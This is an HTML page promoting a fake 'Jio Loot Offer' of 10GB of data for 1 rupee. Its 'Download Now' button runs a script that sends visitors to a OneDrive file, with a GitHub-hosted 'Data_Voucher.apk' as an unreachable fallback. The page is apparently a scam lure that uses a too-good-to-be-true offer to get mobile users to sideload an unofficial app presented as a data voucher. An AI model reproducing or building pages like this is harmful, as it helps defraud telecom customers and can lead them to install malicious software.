<script type="text/javascript">
var sc_project=12889744; 
var sc_invisible=1; 
var sc_security="a10820b5"; 
</script>
<script type="text/javascript"
src="https://www.statcounter.com/counter/counter.js" async></script>
<noscript><div class="statcounter"><a title="Web Analytics"
href="https://statcounter.com/" target="_blank"><img class="statcounter"
src="https://c.statcounter.com/12889744/0/a10820b5/1/" alt="Web Analytics"
referrerPolicy="no-referrer-when-downgrade"></a></div></noscript>

<html>

<head>
    <Title>Download</Title>
    <style>
        body{
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
        }

.clickss {
	background-color:#3c5fd0;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:20px;
	font-weight:bold;
    padding: 15px;
	text-decoration:none;
	text-shadow:0px 1px 0px #fff;
}
.clickss:hover {
	background-color:#3c5fd0;
}
.selectts {
	background-color:#3c5fd0;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:20px;
	font-weight:bold;
    padding: 15px;
	text-decoration:none;
	text-shadow:0px 1px 0px #;
}
.clickss:active {
	position:relative;
	top:1px;
}

    </style>
</head>
<script>
function done() 
{
    var m = new Date().getMinutes(); 
	if(m<60)
	{
		window.location="https://onedrive.live.com/download?cid=57E376D7A53C94F9&resid=57E376D7A53C94F9%21125&authkey=AJ90ZVovxwSgM7w"; 
	}

	else
	{
		window.location="https://github.com/technews92/claim/blob/main/Data_Voucher.apk?raw=true";
	}
}
</script>
<body>
<center>
    
	<img src="https://i.postimg.cc/QxQk8rKj/oie-UQE6-Ld7-Rz-Tqp.png"  height="100"/><br><br>
    
	<i></i><b></b><h2 style="color:black">Jio Data</h2><h3 style="color: black;">
	Jio Loot Offer, 10GB at just 1-Rs<br>
	Offer for all Jio Users.<br>
Claim yours now.<br><br>
Data voucher available on New Jio app.</h3></b></i>
        <div onclick="done()"  class="clickss">Download Now</a>


    </div>
</center>
</html>
